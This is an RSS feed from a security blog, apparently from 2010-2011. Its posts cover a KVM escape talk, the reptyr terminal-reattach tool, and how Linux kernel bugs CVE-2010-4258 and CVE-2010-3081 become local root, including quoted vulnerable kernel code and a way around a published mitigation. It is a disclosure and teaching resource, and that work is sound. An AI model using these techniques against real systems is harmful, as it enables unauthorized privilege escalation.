<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Made of Bugs &#187; linux</title>
	<atom:link href="http://blog.nelhage.com/tag/linux/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.nelhage.com</link>
	<description>It's software. It's made of bugs.</description>
	<lastBuildDate>Thu, 18 Aug 2011 21:57:23 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>BlackHat/DEFCON 2011 talk: Breaking out of KVM</title>
		<link>http://blog.nelhage.com/2011/08/breaking-out-of-kvm/</link>
		<comments>http://blog.nelhage.com/2011/08/breaking-out-of-kvm/#comments</comments>
		<pubDate>Mon, 08 Aug 2011 17:32:29 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[Low-level hacking]]></category>
		<category><![CDATA[blackhat]]></category>
		<category><![CDATA[DEFCON]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[kvm]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=474</guid>
		<description><![CDATA[I&#8217;ve posted the final slides from my talk this year at DEFCON and Black Hat, on breaking out of the KVM Kernel Virtual Machine on Linux. Virtunoid: Breaking out of KVM [Edited 2011-08-11] The code is now available. It should be fairly well-commented, and include links to everything you&#8217;ll need to get the exploit up [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve posted <a href="http://nelhage.com/talks/kvm-defcon-2011.pdf">the final slides</a> from my talk this year at <a href="http://defcon.org/">DEFCON</a> and <a href="http://blackhat.com/">Black Hat</a>, on breaking out of the <a href="http://www.linux-kvm.org/page/Main_Page">KVM</a> Kernel Virtual Machine on Linux.</p>

<div style="width:425px; margin:auto; padding: 1em" id="__ss_8908773"><strong style="display:block;margin:12px 0 4px"><a href="http://www.slideshare.net/NelsonElhage/virtunoid-breaking-out-of-kvm" title="Virtunoid: Breaking out of KVM">Virtunoid: Breaking out of KVM</a></strong><object id="__sse8908773" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=kvm-defcon-2011-110818165327-phpapp02&#038;stripped_title=virtunoid-breaking-out-of-kvm&#038;userName=NelsonElhage" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed name="__sse8908773" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=kvm-defcon-2011-110818165327-phpapp02&#038;stripped_title=virtunoid-breaking-out-of-kvm&#038;userName=NelsonElhage" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object></div>

<p><b>[Edited 2011-08-11]</b> The <a href="https://github.com/nelhage/virtunoid">code is now available</a>. It should be fairly well-commented, and include links to everything you&#8217;ll need to get the exploit up and running in a local test environment, if you&#8217;re so inclined.</p>

<p>In addition, as I mentioned, this bug was found by a simple KVM fuzzer I wrote. I&#8217;m also going to clean that up and release it, but don&#8217;t expect it too soon.</p>

<p>I had a great time meeting lots of interesting people at BlackHat and DEFCON, some that I&#8217;d met online and others I hadn&#8217;t. If any of you are ever in Boston, drop me a note and we can grab a beer or something.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2011/08/breaking-out-of-kvm/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>reptyr: Changing a process&#8217;s controlling terminal</title>
		<link>http://blog.nelhage.com/2011/02/changing-ctty/</link>
		<comments>http://blog.nelhage.com/2011/02/changing-ctty/#comments</comments>
		<pubDate>Wed, 09 Feb 2011 03:06:50 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[linux]]></category>
		<category><![CDATA[reptyr]]></category>
		<category><![CDATA[termios]]></category>
		<category><![CDATA[tty]]></category>
		<category><![CDATA[unix]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=461</guid>
		<description><![CDATA[reptyr (announced recently on this blog) takes a process that is currently running in one terminal, and transplants it to a new terminal. reptyr comes from a proud family of similar hacks, and works in the same basic way: We use ptrace(2) to attach to a target process and force it to execute code of [...]]]></description>
			<content:encoded><![CDATA[<p><a href="https://github.com/nelhage/reptyr">reptyr</a> (<a href="http://blog.nelhage.com/2011/01/reptyr-attach-a-running-process-to-a-new-terminal/">announced</a> recently on this blog) takes a
process that is currently running in one terminal, and transplants it
to a new terminal. <code>reptyr</code> comes from a proud family of similar
hacks, and works in the same basic way: We use <a href="http://linux.die.net/man/2/ptrace"><code>ptrace(2)</code></a>
to attach to a target process and force it to execute code of our own
choosing, in order to open the new terminal, and <code>dup2(2)</code> it over
stdout and stderr.</p>

<p>The main special feature of <code>reptyr</code> is that it actually changes the
controlling terminal of the target process. The &#8220;controlling terminal&#8221;
is a concept maintained by UNIX operating systems that is independent
of a process&#8217;s file descriptors. The controlling terminal governs
details like where <code>^C</code> gets delivered, and how applications are
notified of changes in window size.</p>

<p>Processes are grouped into two levels of hierarchical groups:
sessions, and process groups. Each group is named by an ID, which is
the PID of the initial <strong>leader</strong> (either &#8220;session leader&#8221; or &#8220;process
group leader&#8221;). Even if the leader exits, that number is still the ID
for the group. Sessions are used for terminal management &#8212; Every
process in a session has the same controlling terminal, and each
terminal belongs to at most one session. Process groups are a
sub-division within sessions, and are used primarily for job control
within the shell. For a more in-depth explanation, see <a href="http://blog.nelhage.com/2010/01/a-brief-introduction-to-termios-signaling-and-job-control/">part
3</a> of my earlier series on termios.</p>

<p>If you check out <code>tty_ioctl(4)</code>, you&#8217;ll find that Linux has an
<code>ioctl</code>, <code>TIOCSCTTY</code>, that can be used to set the controlling terminal
of a process, and you could be forgiven for thinking that all we need
is to make the target call that ioctl, and we&#8217;re done.</p>

<p>However, if we read closer, we find that it has several
restrictions. In particular:</p>

<blockquote>
  <p>The calling process must be a session leader and not have a
  controlling terminal already.  If this terminal is already the
  controlling terminal of a different session group then the ioctl fails
  with EPERM […]</p>
</blockquote>

<p>In the typical case, where I&#8217;m trying to attach a (say) <code>mutt</code> that
you spawned from your shell, <code>mutt</code> won&#8217;t be a session leader &#8212; your
shell will be the session leader, and <code>mutt</code> will be the process group
leader for a process group containing only itself.</p>

<p>So, we need to make the target a session leader. Conveniently, there&#8217;s
a system call for that: <code>setsid(2)</code>.</p>

<p>However, reading that man page, we find a new caveat: <code>setsid(2)</code>
fails with <code>EPERM</code> if</p>

<blockquote>
  <p>The process group ID of any process equals the PID of the calling
  process.  Thus, in particular, setsid() fails if the calling process
  is already a process group leader.</p>
</blockquote>

<p>The shell creates a new process group for every job you launch, and so
our target <code>mutt</code> will be a process group leader, and unable to
<code>setsid()</code>. The usual solution for programs that want to setsid is to
<code>fork()</code>, so that the child is still in the parent&#8217;s session and
process group, and then <code>setsid()</code> in the child. However, <code>fork()</code>ing
our <code>mutt</code> and killing off the parent seems potentially disruptive, so
let&#8217;s see if we can avoid that.</p>

<p>So, we&#8217;re going to need to change <code>mutt</code>&#8216;s process group ID, so that
there are no processes with process group IDs equal to its
PID. Following some trusty <em><code>SEE ALSO</code></em> links, we get to
<code>setpgid(2)</code>. There&#8217;s a bunch of text in that man page, but the key
bit is:</p>

<blockquote>
  <p>If setpgid() is used to move a process from one process group to
  another, both process groups must be part of the same session (see
  setsid(2) and credentials(7)).  In this case, the pgid specifies an
  existing process group to be joined and the session ID of that group
  must match the session ID of the joining process.</p>
</blockquote>

<p>We need to find a process group in the same session as <code>mutt</code> to move
our <code>mutt</code> into, and then we&#8217;ll be able to <code>setsid</code>. We could try to
find one &#8212; the shell is a plausible candidate, for instance &#8212; but
there&#8217;s an alternate, more direct route: Create one.</p>

<p>While we have <code>mutt</code> captured with <code>ptrace</code>, we can make it <code>fork(2)</code>
a dummy child, and start tracing that child, too. We&#8217;ll make the child
<code>setpgid</code> to make it into its own process group, and then get <code>mutt</code>
to <code>setpgid</code> itself into the child&#8217;s process group. <code>mutt</code> can then
<code>setsid</code>, moving into a new session, and now, as a session leader, we
can finally <code>ioctl(TIOCSCTTY)</code> on the new terminal, and we win.</p>

<p>It turns out I didn&#8217;t invent this technique &#8212; <a href="http://blog.habets.pp.se/2009/03/Moving-a-process-to-another-terminal">injcode</a> and
<a href="http://caca.zoy.org/wiki/neercs">neercs</a> work the same way. But I did discover it
independently of them, and it was a fun little hunt through unix
arcana.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2011/02/changing-ctty/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>reptyr: Attach a running process to a new terminal</title>
		<link>http://blog.nelhage.com/2011/01/reptyr-attach-a-running-process-to-a-new-terminal/</link>
		<comments>http://blog.nelhage.com/2011/01/reptyr-attach-a-running-process-to-a-new-terminal/#comments</comments>
		<pubDate>Sat, 22 Jan 2011 01:56:01 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Low-level hacking]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[ptrace]]></category>
		<category><![CDATA[reptyr]]></category>
		<category><![CDATA[screenify]]></category>
		<category><![CDATA[termios]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=450</guid>
		<description><![CDATA[Over the last week, I&#8217;ve written a nifty tool that I call reptyr. reptyr is a utility for taking an existing running program and attaching it to a new terminal. Started a long-running process over ssh, but have to leave and don&#8217;t want to interrupt it? Just start a screen, use reptyr to grab it, [...]]]></description>
			<content:encoded><![CDATA[<p>Over the last week, I&#8217;ve written a nifty tool that I call
<a href="http://github.com/nelhage/reptyr">reptyr</a>. reptyr is a utility for taking an existing running
program and attaching it to a new terminal. Started a long-running
process over ssh, but have to leave and don&#8217;t want to interrupt it?
Just start a screen, use reptyr to grab it, and then kill the ssh
session and head on home.</p>

<p>You can <a href="http://github.com/nelhage/reptyr">grab the source</a>, or read on for some more details.</p>

<p>There&#8217;s a shell script called <a href="http://tomaw.net/tmp/screenify">screenify</a> that&#8217;s been going
around the internet for nigh on 10 years now that is supposed to use
gdb to accomplish the same thing. There&#8217;s also a project called
<a href="http://pasky.or.cz/~pasky/dev/retty/">retty</a> that tries to do the same thing, in C using <code>ptrace()</code>
directly.</p>

<p>The difference between those programs and reptyr is that reptyr works
much, much, better.</p>

<p>If you attach a <code>less</code> using screenify or retty, it will still take
input from the old terminal. If you attach an ncurses program, and
resize the window, the program probably won&#8217;t resize correctly. <code>^C</code>
and <code>^Z</code> will still be processed on the old terminal &#8212; typing them in
the new terminal won&#8217;t do anything useful.</p>

<p>reptyr fixes all of these problems and more, and is the only such tool
I know of that does so. I&#8217;ve never seen a program that doesn&#8217;t behave
noticeably incorrectly after attaching with retty or screenify,
whereas with reptyr most programs I have tried work flawlessly.</p>

<h2>How does it work?</h2>

<p><code>reptyr</code> works in the same basic way as <code>screenify</code> and <code>retty</code> &#8212; it
attaches to the target process using the <code>ptrace</code> API, opens the new
terminal, and <code>dup2</code>s it over the old file descriptors. It also copies
the termios settings from the old terminal to the new terminal.</p>

<p>The main thing that reptyr does that no one else does is that it
actually changes the controlling terminal of the process you are
attaching. This is the detail that makes many things Just Work,
including <code>^C</code> and <code>^Z</code> and window resizing.</p>

<p>Switching the target&#8217;s controlling terminal is not easy and involves a
fair bit of trickery with <code>ptrace</code> and Linux&#8217;s terminal APIs. I will
probably do another blog post some time about the dirty details of how
I make this work, but for now you can check out
<a href="https://github.com/nelhage/reptyr/blob/master/attach.c">attach.c</a> if
you really want to know.</p>

<p>reptyr still has a number of limitations &#8212; it doesn&#8217;t generally work,
for example, if the target process has any children. I know how to fix
most of these problems, though, so expect it to get better with
time. Please let me know if you find it useful!</p>

<h2>Appendix</h2>

<p>(Edited to add:) Nothing is really new. A commenter on reddit pointed out that <a href="http://blog.habets.pp.se/2009/03/Moving-a-process-to-another-terminal">injcode</a>
and <a href="http://caca.zoy.org/wiki/neercs">neercs</a> both accomplish the same thing, even using the same trick
to change the CTTY. Ah well, I had run writing it anyways, and apparently I
wasn&#8217;t the only one who didn&#8217;t know about the existing alternatives. <code>neercs</code> is a full screen replacement, though, and I think that reptyr should be more robust than <code>injcode</code> &#8212; I use a different techique for <code>ptrace</code>-hijacking, for example &#8212; and so hopefully this tool still has a niche as a more robust standalone utility. Certainly, judging from the amount of enthusiasm I&#8217;ve seen for this tool, this still isn&#8217;t a problem that is solved to the average user&#8217;s satisfaction.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2011/01/reptyr-attach-a-running-process-to-a-new-terminal/feed/</wfw:commentRss>
		<slash:comments>42</slash:comments>
		</item>
		<item>
		<title>CVE-2010-4258: Turning denial-of-service into privilege escalation</title>
		<link>http://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/</link>
		<comments>http://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/#comments</comments>
		<pubDate>Fri, 10 Dec 2010 16:02:11 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[bugs]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[full-nelson]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=418</guid>
		<description><![CDATA[Dan Rosenberg recently released a privilege escalation bug for Linux, based on three different kernel vulnerabilities I reported recently. This post is about CVE-2010-4258, the most interesting of them, and, as Dan writes, the reason he wrote the exploit in the first place. In it, I&#8217;m going to do a brief tour of the various [...]]]></description>
			<content:encoded><![CDATA[<p>Dan Rosenberg recently <a href="http://thread.gmane.org/gmane.comp.security.full-disclosure/76457">released</a> a privilege escalation bug
for Linux, based on three different kernel vulnerabilities I reported
recently. This post is about CVE-2010-4258, the most interesting of them, and,
as Dan writes, the reason he wrote the exploit in the first place. In it, I&#8217;m
going to do a brief tour of the various kernel features that collided to make
this bug possible, and explain how they combine to turn an otherwise-boring oops
into privilege escalation.</p>

<h2><code>access_ok</code></h2>

<p>When a user application passes a pointer to the kernel, and the kernel
wants to read or write from that pointer, the kernel needs to perform
various checks that a buggy or malicious userspace app hasn&#8217;t passed
an &#8220;evil&#8221; pointer.</p>

<p>Because the kernel and userspace run in the same address space, the
most important check is simply that the pointer points into the
&#8220;userspace&#8221; part of the address space. User applications are protected
by page table permissions from writing into kernel memory, but the
kernel isn&#8217;t, and so must explicitly check that any pointers given to
it by a user don&#8217;t point into the kernel region.</p>

<p>The address space is laid out such that user applications get the
bottom portion, and the kernel gets the top, so this check is a simple
comparison against that boundary. The kernel function that performs
this check is called <code>access_ok</code>, although there are various other
functions that do the same check, implicitly or otherwise.</p>

<h2><code>get_fs()</code> and <code>set_fs()</code></h2>

<p>Occasionally, however, the kernel finds it useful to change the rules for what
<code>access_ok</code> will allow. <code>set_fs()</code><sup><a href="#fn.1" class="footnote" name="fnr.1">1</a></sup> is an internal Linux function that is used to
override the definition of the user/kernel split, for the current process.</p>

<p>After a <code>set_fs(KERNEL_DS)</code>, no checking is performed that user pointers
point to userspace &#8212; <code>access_ok</code> will always return
true. <code>set_fs(KERNEL_DS)</code> is mainly used to enable the kernel to wrap
functions that expect user pointers, by passing them pointers into the
kernel address space. A typical use reads something like this:</p>

<pre><code>old_fs = get_fs(); set_fs(KERNEL_DS);
vfs_readv(file, kernel_buffer, len, &amp;pos);
set_fs(old_fs);
</code></pre>

<p><code>vfs_readv</code> expects a user-provided pointer, so without the <code>set_fs()</code>, the
<code>access_ok()</code> inside <code>vfs_readv()</code> would fail on our kernel buffer, so we use
<code>set_fs()</code> to effectively temporarily disable that checking.</p>

<h2>Kernel oopses</h2>

<p>When the kernel oopses, perhaps because of a <code>NULL</code> pointer
dereference in kernelspace, or because of a call to the <code>BUG()</code> macro
to indicate an assertion failure, the kernel attempts to clean up, and
then tries to kill the current process by calling the <code>do_exit()</code>
function to exit the current process.</p>

<p>When the kernel does so, it&#8217;s still running in the same process
context it was before the oops occured, including any <code>set_fs()</code>
override, if applicable. Which means that <code>do_exit</code> will get called
with <code>access_ok</code> disabled &#8212; not something anyone expected when they
wrote the individual pieces of this system.</p>

<h2><code>clear_child_tid</code></h2>

<p>As it turns out, <code>do_exit</code> contains a write to a user-controlled
address that expects <code>access_ok</code> to be working properly!</p>

<p><code>clear_child_tid</code> is a feature where, on thread exit, the kernel can
be made to write a zero into a specified address in that thread&#8217;s
address space, in order to notify other threads of that exit.</p>

<p>This is implemented by simply storing a pointer to the to-be-zeroed
address inside <code>struct task_struct</code> (which represents a single thread
or process), and, on exit, <code>mm_release</code>, called from <code>do_exit</code>, does:</p>

<pre><code>put_user(0, tsk-&gt;clear_child_tid);
</code></pre>

<p>This is normally safe, because <code>put_user</code> checks that its second
argument falls into the &#8220;userspace&#8221; segment before doing a write. But,
if we are running with <code>get_fs() == KERNEL_DS</code>, it will happily accept
any address at all, even one pointing into kernel space.</p>

<p>So, if we find any kernel <code>BUG()</code> or <code>NULL</code> dereference, or other page
fault, that we can trigger after a <code>set_fs(KERNEL_DS)</code>, we can trick
the kernel into a user-controlled write into kernel memory!</p>

<h2><code>splice()</code> et. al.</h2>

<p>An obvious question at this point is: How much of the kernel can an
attacker cause to run with <code>get_fs() == KERNEL_DS</code>?</p>

<p>There are a number of small special cases. For example, the binary
sysctl compatibility code works by calling the normal <code>/proc/</code> write
handlers from kernelspace, under <code>set_fs()</code>. handful of compat-mode
(32 on 64) syscalls work similarly.</p>

<p>By far the biggest source I&#8217;ve found, however, is the <code>splice()</code>
system call. The <code>splice()</code> system call is a relatively recent
addition to Linux, and allows for zero-copy transfer of pages between
a pipe and another file descriptor.</p>

<p>As of 2.6.31, attempts to <code>splice()</code> to or from an fd that doesn&#8217;t
support special handling to actually do zero-copy <code>splice</code>, will fall
back on doing an ordinary <code>read()</code>, <code>write()</code>, or <code>sendmsg()</code> on the
fd &#8230; from the kernel, using set_fs() in order to pass in kernel
buffers.</p>

<p>What that means it that by using <code>splice()</code>, an attacker can call the
bulk of the code in most obscure filesystems and socket types (which
tend not to have explicit <code>splice()</code> support) with a segment override
in place. Conveniently for an attacker, that is also exactly a
description of where the bulk of the random security bugs tend to be.</p>

<p>This is also exactly the technique Dan&#8217;s exploit uses. He uses
CVE-2010-3849, an otherwise boring <code>NULL</code> pointer dereference I
reported in the Econet network protocol. His exploit code does a
<code>splice()</code> to an econet socket, causing the <code>econet_sendsmg</code> handler to
get called under <code>set_fs(KERNEL_DS)</code>. When it oopses, <code>do_exit</code> is
called, and he gets a user-controlled write into kernel
memory. Everything else is just details.</p>

<p><div id="footnotes">
<h2 class="footnotes">Footnotes: </h2>
<div id="text-footnotes">
<p class="footnote"><sup><a class="footnum" name="fn.1" href="#fnr.1">1</a></sup> Back in Linux 1.x, this function actually set the <tt>%fs</tt> register on i386. It hasn&#8217;t in years, but it&#8217;s used in too many places for changing the name to be worth it.</p>
</div></div></p>


]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Some notes on CVE-2010-3081 exploitability</title>
		<link>http://blog.nelhage.com/2010/11/exploiting-cve-2010-3081/</link>
		<comments>http://blog.nelhage.com/2010/11/exploiting-cve-2010-3081/#comments</comments>
		<pubDate>Tue, 30 Nov 2010 16:58:01 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[linux]]></category>
		<category><![CDATA[cve-2010-3081]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=401</guid>
		<description><![CDATA[Most of you reading this blog probably remember CVE-2010-3081. The bug got an awful lot of publicity when it was discovered an announced, due to allowing local privilege escalation against virtually all 64-bit Linux kernels in common use at the time. While investigating CVE-2010-3081, I discovered that several of the commonly-believed facts about the CVE [...]]]></description>
			<content:encoded><![CDATA[<p>Most of you reading this blog probably remember
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3081">CVE-2010-3081</a>. The bug got an awful lot of publicity when it
was discovered an announced, due to allowing local privilege
escalation against virtually all 64-bit Linux kernels in common use at
the time.</p>

<p>While investigating CVE-2010-3081, I discovered that several of the
commonly-believed facts about the CVE were wrong, and it was even more
broadly exploitable than was publically documented. I&#8217;d like to share
those observations here.</p>

<h2>A brief review of the bug</h2>

<p>The bug arose from the <code>compat_alloc_user_space</code> function in Linux&#8217;s
32-bit compatibility support on 64-bit
systems. <code>compat_alloc_user_space</code> allocates and returns space on the
userspace kernel stack for the kernel to use:</p>

<pre><code>static inline void __user *compat_alloc_user_space(long len)
{
    struct pt_regs *regs = task_pt_regs(current);
    return (void __user *)regs-&gt;sp - len;
}
</code></pre>

<p>This function is only called by compat-mode syscalls, so <code>current</code> is assumed to
be a 32-bit process, in which case <code>regs-&gt;sp</code>, the user stack pointer, will be a
32-bit quantity. This, if we subtract a small <code>len</code>, the result should still fit
in 32 bits, which, on a 64-bit system means it is guaranteed to fall within the
user address space.</p>

<p>Because of this, some callers of <code>compat_alloc_user_space</code> were lazy, and did
not call <code>access_ok</code> (or a function which called <code>access_ok</code>) to check that the
result of <code>compat_alloc_user_space</code> fell within the user address space.</p>

<p>However, it turned out that some call sites in the kernel called
<code>compat_alloc_user_space</code> with a user-controlled <code>len</code> value, allowing the
subtraction to wrap around. On a 64-bit system, the kernel lives in the top four
gigabytes of memory, and so this wraparound is enough for a user to cause
<code>compat_alloc_user_space</code> to return a pointer into the kernel&#8217;s address space.</p>

<p>Moreover, it turned out that the functions that used a user-controlled <code>len</code>
also did not check <code>access_ok</code> on the result of the allocation. In particular,
Linux 2.6.26 introduced the <code>compat_mc_getsockopt</code> function, which called
<code>compat_alloc_user_space</code> with a user-controlled length and then copied
user-controlled data to this pointer. It is this function which the public
exploit targetted.</p>

<h2>Disabling 32-bit binaries doesn&#8217;t help</h2>

<p>When an <a href="http://www.seclists.org/fulldisclosure/2010/Sep/268">exploit</a> was released for this bug, many sources
circulated a <a href="https://access.redhat.com/kb/docs/DOC-40265">mitigation</a>: Disable 32-bit binaries on a
system. Prevent compat-mode processes from running, the logic goes,
and you prevent anyone from making a compat-mode syscall that triggers
the vulnerable path.</p>

<p>This mitigation indeed prevented the public exploit from working (it
included 32-bit inline assembly, and so couldn&#8217;t even easily be
recompiled as a 64-bit binary), and many observers seemed to believe
it closed the bug entirely.</p>

<p>However, this was not the case! It turns out, on an <code>amd64</code> system, a
64-bit process can still make a compat-mode system call using the <code>int
$0x80</code> instruction, which is the traditional 32-bit syscall mechanism!
Even though the process is running in 64-bit mode, <code>int $0x80</code>
redirects to the compat-mode syscall table.</p>

<p>After realizing this, modifying the public exploit to work when
compiled in 64-bit mode was a simple matter of porting the inline
assembly, and changing a small handful of types. I&#8217;ve posted the
modified <a href="http://nelhage.com/files/abftw_64.c">exploit</a> and the <a href="http://nelhage.com/files/abftw.diff">diff</a> against the original
for the curious.</p>

<h2>The integer overflow is totally irrelevant</h2>

<p>Once you&#8217;ve realized that you can make compat-mode system calls from a 64-bit
process, a little bit of thought reveals something else
interesting. <code>compat_alloc_user_space</code> subtracts the <code>len</code> value off of the
userspace stack pointer. Previously, we relied on subtracting a large value from
a 32-bit stack pointer in order to end up with a kernel pointer. However, while
a 32-bit is limited to a 32-bit stack pointer, a 64-bit process can write a full
64-bit value into <code>%rsp</code>, and thus <code>regs-&gt;sp</code>! There&#8217;s no need for underflow at
all &#8212; you can just write a 64-bit value into <code>%rsp</code> and do an <code>int $0x80</code>, and
make <code>compat_alloc_user_space</code> return any value you please!</p>

<p>The condition for exploitability thus drops from &#8220;user-controlled
<code>len</code> and no <code>access_ok</code>&#8221; to simply &#8220;no <code>access_ok</code>&#8220;.</p>

<p>This is interesting, because it turns out that some very old kernels, before
2.6.11, including RHEL 4, have the following function:</p>

<pre><code>int siocdevprivate_ioctl(unsigned int fd, unsigned int cmd, unsigned long arg)
{
        struct ifreq __user *u_ifreq64;

        ...
        u_ifreq64 = compat_alloc_user_space(sizeof(*u_ifreq64));

        /* Don't check these user accesses, just let that get trapped
         * in the ioctl handler instead.
         */
        copy_to_user(&amp;u_ifreq64-&gt;ifr_ifrn.ifrn_name[0], &amp;tmp_buf[0], IFNAMSIZ);
        __put_user(data64, &amp;u_ifreq64-&gt;ifr_ifru.ifru_data);

        return sys_ioctl(fd, cmd, (unsigned long) u_ifreq64);
}
</code></pre>

<p>Remember, we can make <code>compat_alloc_user_space</code> return an arbitrary
value. The <code>copy_to_user</code> will call <code>access_ok</code> and fail, but that
return value will be discarded, and the <code>__put_user</code> will scribble 32
bits of user-controlled data at a user-controlled address. Bingo,
local root.</p>

<p>It turns out this function was present in Linux 2.4.x, too, meaning
that this exploit even affected RHEL3 and anyone else still running a
2.4-based system!</p>

<p>Based on this exploit, I&#8217;ve produced a working proof-of-concept
exploit for RHEL4, based on the released exploit for RHEL5. Contact me
if you&#8217;re interested, but it&#8217;s pretty straightforward.</p>

<h2>Closing notes</h2>

<p>As far as I know, neither of these facts has been publically
documented prior to this post. I shared this information with Red Hat,
and they requested I keep it private until they released fixes for
RHEL 3, which happened last week. I would not be at all surprised to
learn that someone else has private exploits that incorporate either
or both of these observations, though.</p>

<p>One important moral here is you must be <em>very careful</em> when declaring
a system unaffected by a vulnerability, or declaring a mitigation to
be complete. Software systems have gotten tremendously complex, and
it&#8217;s often impossible to be totally confident you understand every
last way an attacker could tickle a vulnerability.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/11/exploiting-cve-2010-3081/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>A brief look at Linux&#8217;s security record</title>
		<link>http://blog.nelhage.com/2010/09/a-brief-look-at-linuxs-security-record/</link>
		<comments>http://blog.nelhage.com/2010/09/a-brief-look-at-linuxs-security-record/#comments</comments>
		<pubDate>Mon, 27 Sep 2010 03:16:19 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=343</guid>
		<description><![CDATA[After the fuss of the last two weeks because of CVE-2010-3081 and CVE-2010-3301, I decided to take a look at a handful of the high-profile privilege escalation vulnerabilities in Linux from the last few years. So, here&#8217;s a summary of the ones I picked out. There are also a large number of smaller ones, like [...]]]></description>
			<content:encoded><![CDATA[<p>After the fuss of the last two weeks because of <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3081">CVE-2010-3081</a> and <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3301">CVE-2010-3301</a>, I decided to take a look at a handful of the high-profile privilege escalation vulnerabilities in Linux from the last few years.
</p>

<p></p><p>
So, here&#8217;s a summary of the ones I picked out. There are also a large number of smaller ones, like an <a href="http://sota.gen.nz/af_can/"><code>AF&#95;CAN</code></a> exploit, or the <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-1084">l2cap</a> overflow in the Bluetooth subsystem, that didn&#8217;t get as much publicity, because they were found more quickly or didn&#8217;t affect as many default configurations.
</p>
<table border="2" cellspacing="0" cellpadding="6" rules="groups" frame="hsides">
<col align="left"></col><col align="left"></col><col align="right"></col><col align="right"></col><col align="left"></col>
<thead>
<tr><th>CVE name</th><th>Nickname</th><th>introduced</th><th>fixed</th><th>notes</th></tr>
</thead>
<tbody>
<tr><td>CVE-2006-2451</td><td><code>prctl</code></td><td>2.6.13</td><td>2.6.17.4</td><td></td></tr>
<tr><td>CVE-2007-4573</td><td><code>ptrace</code></td><td>2.4.x</td><td>2.6.22.7</td><td>64-bit only</td></tr>
<tr><td>CVE-2008-0009</td><td><code>vmsplice</code> (1)</td><td>2.6.22</td><td>2.6.24.1</td><td></td></tr>
<tr><td>CVE-2008-0600</td><td><code>vmsplice</code> (2)</td><td>2.6.17</td><td>2.6.24.2</td><td></td></tr>
<tr><td>CVE-2009-2692</td><td><code>sock&#95;sendpage</code></td><td>2.4.x</td><td>2.6.31</td><td><code>mmap&#95;min&#95;addr</code> helped <sup><a class="footref" name="fnr.1" href="#fn.1">1</a></sup></td></tr>
<tr><td>CVE-2010-3081</td><td><code>compat&#95;alloc&#95;user&#95;space</code></td><td>2.6.26<sup><a class="footref" name="fnr.2" href="#fn.2">2</a></sup></td><td>2.6.36</td><td></td></tr>
<tr><td>CVE-2010-3301</td><td><code>ptrace</code> (redux)</td><td>2.6.27</td><td>2.6.36</td><td>64-bit only</td></tr>
</tbody>
</table>

<p>
I&#8217;ll probably have some more to say about these bugs in the future, but here&#8217;s a few thoughts:
</p>

<p><ul>
<li>
At least two of these bugs existed since the 2.4 days. So no matter what kernel you&#8217;ve been running, you had privilege escalation bugs you didn&#8217;t know about for as long as you were running that kernel. We don&#8217;t know whether or not the blackhats knew about them, but are you feeling lucky?
</li>
<li>
I bet there are at least a few more privesc bugs dating back to 2.4 we haven&#8217;t found yet.
</li>
<li>
